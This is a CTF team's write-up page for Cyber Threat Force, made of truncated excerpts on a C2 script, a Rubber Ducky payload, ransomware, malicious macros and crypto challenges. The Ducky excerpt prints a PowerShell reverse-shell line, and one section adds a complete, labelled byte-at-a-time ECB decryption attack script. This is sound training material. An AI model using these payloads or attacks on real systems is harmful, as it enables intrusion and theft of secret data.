Cyber Threat Force (CTF)

This was a short CTF (48h), a format that I like since it doesn’t eat up too much of my time. I enjoyed it with my friends: Lukho, R0ck3t and Volker. We registered a team on CTFTime: Root Root. We ranked 4th out of 197 teams, scoring 6935 points. And I personally ranked 6th, scoring 3775 points and completing 19 challenges! Here are the challenges that I completed or spent time on, with links to my writeups:

Writeup Cyber Threat Force : Azkaban C2

For this challenge, we were given a python script:

```python
import socket

def menu():
    print("______________________")
    print("| MENU |")
    print("| 1) see option |")
    print("| 2) edit option |")
    print("| 3) connect |")
    print("______________________")
    print("""
______ __ __ ______ / \ / | / | / \ /$$$$$$ | ________ $$ | __ ______ $$ |____ ______ _______ _______ /$$$$$$ | $$ |__$$ |/ |$$ | / | / \ $$ \ / \ / \ / |$$____$$ | $$ $$ |$$$$$$$$/ $$ |_/$$/ $$$$$$ |$$$$$$$ | $$$$$$ |$$$$$$$ | /$$$$$$$/ / $$/ $$$$$$$$ | / $$/ $$ $$< / $$ |$$ | $$ | / $$ |$$ | $$ | $$ | /$$$$$$/ $$ | $$ | /$$$$/__ $$$$$$ \ /$$$$$$$ |$$ |__$$ |/$$$$$$$ |$$ | $$ | $$ \_____ $$ |_____ $$ | $$ |/$$ |$$ | $$ |$$ $$ |$$ $$/ $$ $$ |$$ | $$ | $$ |$$ | $$/ $$/ $$$$$$$$/ $$/ $$/ $$$$$$$/ $$$$$$$/ $$$$$$$/ $$/ $$/ $$$$$$$/ $$$$$$$$/
-----=[Azkaban C2 v.
```

Writeup Cyber Threat Force : Like a duck in water

Note: I did not solve this challenge during the CTF, but my teammate Lukho did.

For this challenge, we were given an inject.bin file, which contains an encoded Rubber Ducky payload. We can use the Duck Toolkit to get back the original code:

```
DELAY
DELAY
powershell Start-Process notepad -Verb runAs
ENTER
DELAY
DELAY
ENTER
DELAY
m
DELAY
DOWNARROW
...
DOWNARROW
ENTER
$folderDateTime = (get-date).ToString('d-M-y HHmmss')
ENTER
...
Add-Content "$env:TEMP\72794.ps1" '$c = New-Object System.Net.Sockets.TCPClient("CYBERTF{D0N4LD_DUC|<}",443);$s = $c.
```

Writeup Cyber Threat Force : Usb key cemetery

Note: I did not solve this challenge during the CTF, but my teammate Volker did.

For this challenge, we were given a zip containing an encoded syslog (sysloc.enc), and an auth.json file:

```json
{
  "manufact": [
    "Apple Inc.",
    "Azurewave",
    "Generic",
    "Linux 5.10.0-kali8-amd64 xhci-hcd",
    "usbrip-4381"
  ],
  "pid": [
    "0002",
    "0003",
    "0129",
    "0608",
    "12a8",
    "3491",
    "56dd",
    "usbrip-4381"
  ],
  "prod": [
    "USB2.0 HD UVC WebCam",
    "USB2.0 Hub",
    "USB2.0-CRW",
    "iPhone",
    "usbrip-4381",
    "xHCI Host Controller"
  ],
  "serial": [
    "0000:03:00.
```

Writeup Cyber Threat Force : Trojan tools

For this challenge, we were given a TROJAN_TOOLS.exe file. Before analyzing it manually, I tried feeding it to Hybrid Analysis. Here is the link to the full report. The “Interesting strings” section contained the flag: CYBERTF{Y0u_H4s_P3wn_Th3_H4ck_T0ol}.

We can also try to solve the challenge in a more conventional way. Executing the application gives us:

```
C:\Users\IEUser\Desktop>original.exe
Please enter the good PIN
```

Using a process monitor

We can use procmon from the Sysinternals suite to monitor the process.

Writeup Cyber Threat Force : Viking crypt

For this challenge, we were given a ransomware (VIKING_CRYPT.exe and VIKING_DECRYPT.exe) along with a LOCKER.HTML file and IMPORTANT_NOTE.txt.vkg. Let’s take a look at that encrypted note:

```
$ file Perso/IMPORTANT_NOTE.txt.vkg
Perso/IMPORTANT_NOTE.txt.vkg: ASCII text, with no line terminators
$ cat Perso/IMPORTANT_NOTE.txt.vkg
8a9b600b5a745d39cb7c7e7890e816848a9fe77280b42ca0751d150bb849
```

It doesn’t really look like any encryption I know. (The output is 60 hex digits, i.e. 30 bytes, which is not a multiple of the 16-byte AES block size, so a padded block cipher is unlikely.) We can try to run VIKING_DECRYPT.exe: as expected, we’re asked for a decryption key. Let’s encrypt a few files in a VM, and compare the plaintext and the .

Writeup Cyber Threat Force : (Un)Efficient encryption

For this challenge, we were given two pcapng files, comm1.pcapng and comm2.pcapng, and a text file. The text file contains this (translated from French):

Hello Agent-CTF,
We recently intercepted a message, encrypted with an unknown algorithm. We have linked this message to an earlier message containing a suspicious discussion between two members of the APT. Your mission is to decrypt the communications.
Good luck,
HQ

We can use tshark to view the raw data of the network captures:

Writeup Cyber Threat Force : The document is strange

For this challenge, we were given a CV.doc document. Opening it reveals a pretty normal-looking resume template, and a warning about macros from LibreOffice.

Using the macros menu, we can dump their code:


Writeup Cyber Threat Force : Strange service

For this challenge, we were given access to a service. The description told us that it was an encryption oracle which used AES to encrypt what we sent it, concatenated with critical data. I’m writing this after the challenge ended, so I can’t include demos. The description should make us think of byte-at-a-time ECB decryption attacks, which are well explained here: Cryptopals - Byte-at-a-time ECB decryption (Simple)

Why is byte-at-a-time ECB decryption a vulnerability?
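The attack the description points to, as an added example that is not part of the original writeup (the challenge service is gone, so a constructed local oracle stands in for it). The oracle returns ECB(pad(input || secret)) and the attacker recovers `secret` one byte at a time with at most 256 queries per byte. The code uses real AES-ECB through the `cryptography` package when that is installed and otherwise a keyed SHA-256 per-block PRF (an assumption made so the example runs without dependencies; it keeps the one property the attack needs, that equal blocks encrypt to equal blocks under one key). The secret value, the key and every helper name are constructed.

```python
import hashlib
import os

BLOCK = 16

try:
    # Real AES-ECB when the `cryptography` package is installed.
    from cryptography.hazmat.backends import default_backend
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def _ecb_encrypt(key: bytes, padded: bytes) -> bytes:
        enc = Cipher(algorithms.AES(key), modes.ECB(), backend=default_backend()).encryptor()
        return enc.update(padded) + enc.finalize()
except ImportError:
    # Stand-in (assumption, for a dependency-free run): a keyed SHA-256 PRF per 16-byte block.
    # Not a block cipher, but it keeps the one property the attack exploits: under one key,
    # equal plaintext blocks give equal ciphertext blocks.
    def _ecb_encrypt(key: bytes, padded: bytes) -> bytes:
        return b"".join(hashlib.sha256(key + padded[i:i + BLOCK]).digest()[:BLOCK]
                        for i in range(0, len(padded), BLOCK))


def pkcs7_pad(data: bytes, block: int = BLOCK) -> bytes:
    n = block - len(data) % block
    return data + bytes([n]) * n


class EcbOracle:
    """Constructed model of the challenge service: ECB(pad(user_input || SECRET))."""

    def __init__(self, secret: bytes):
        self._key = os.urandom(16)  # never revealed to the attacker
        self._secret = secret       # the "critical data" the attacker wants
        self.queries = 0

    def encrypt(self, data: bytes) -> bytes:
        self.queries += 1
        return _ecb_encrypt(self._key, pkcs7_pad(data + self._secret))


def find_block_size(oracle: EcbOracle) -> int:
    """Grow the input until the ciphertext grows; the jump is one block."""
    base = len(oracle.encrypt(b""))
    for i in range(1, 65):
        n = len(oracle.encrypt(b"A" * i))
        if n > base:
            return n - base
    raise RuntimeError("no block boundary found")


def is_ecb(oracle: EcbOracle, block: int) -> bool:
    """Three identical plaintext blocks must yield repeated ciphertext blocks under ECB."""
    ct = oracle.encrypt(b"A" * (3 * block))
    blocks = [ct[i:i + block] for i in range(0, len(ct), block)]
    return len(blocks) != len(set(blocks))


def recover_secret(oracle: EcbOracle, block: int) -> bytes:
    """Byte-at-a-time: pad so exactly one unknown byte ends a block, then try all 256 values."""
    known = b""
    while True:
        prefix = b"A" * (block - 1 - len(known) % block)
        idx = (len(prefix) + len(known)) // block  # block that ends with the unknown byte
        sl = slice(idx * block, (idx + 1) * block)
        target = oracle.encrypt(prefix)[sl]
        for b in range(256):
            if oracle.encrypt(prefix + known + bytes([b]))[sl] == target:
                known += bytes([b])
                break
        else:
            # No candidate matched: the aligned byte was PKCS#7 padding, which changed
            # from 0x01 to 0x02 when the input grew. Drop that 0x01 and stop.
            return known[:-1]


def demo(secret: bytes = b"CYBERTF{constructed_example_flag}") -> bytes:
    oracle = EcbOracle(secret)
    block = find_block_size(oracle)
    if not is_ecb(oracle, block):
        raise RuntimeError("oracle is not ECB; this attack does not apply")
    return recover_secret(oracle, block)


if __name__ == "__main__":
    print(demo())
```

The answer to the heading is in `recover_secret`: ECB is deterministic per block, so an attacker who controls the prefix can line a single unknown byte up at the end of a block and compare the oracle's output against all 256 candidates, turning an encryption oracle into a decryption oracle. The stop condition matters on a real service: once the whole secret is out, the aligned byte is PKCS#7 padding, whose value changes as the input grows, so no candidate matches and the loop ends instead of returning garbage.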

Writeup Cyber Threat Force : Strange administration service

For this challenge, we were given access to a server which we can connect to:

```
$ nc 144.217.73.235 27099
give me cmd|token
example:
ls|c9af5ac08978481063b711f031f38518a7c2d83d6db3eabacbd7726470e8a140
id|69a4061766769d0a19ab59e6f905f7ac5875691b62765cb6b3b5ee6ae08f776a
ls|c9af5ac08978481063b711f031f38518a7c2d83d6db3eabacbd7726470e8a140
chall.py
wrapper
$ nc 144.217.73.235 27099
give me cmd|token
example:
ls|c9af5ac08978481063b711f031f38518a7c2d83d6db3eabacbd7726470e8a140
id|69a4061766769d0a19ab59e6f905f7ac5875691b62765cb6b3b5ee6ae08f776a
whoami|c9af5ac08978481063b711f031f38518a7c2d83d6db3eabacbd7726470e8a140
Bad Token
```

It executes the command we give it, provided we also supply the matching token: reusing the ls token with whoami is rejected. The challenge description told us that the token format is HASH(SECRET || CMD). This should instantly make us think of hash length extension attacks.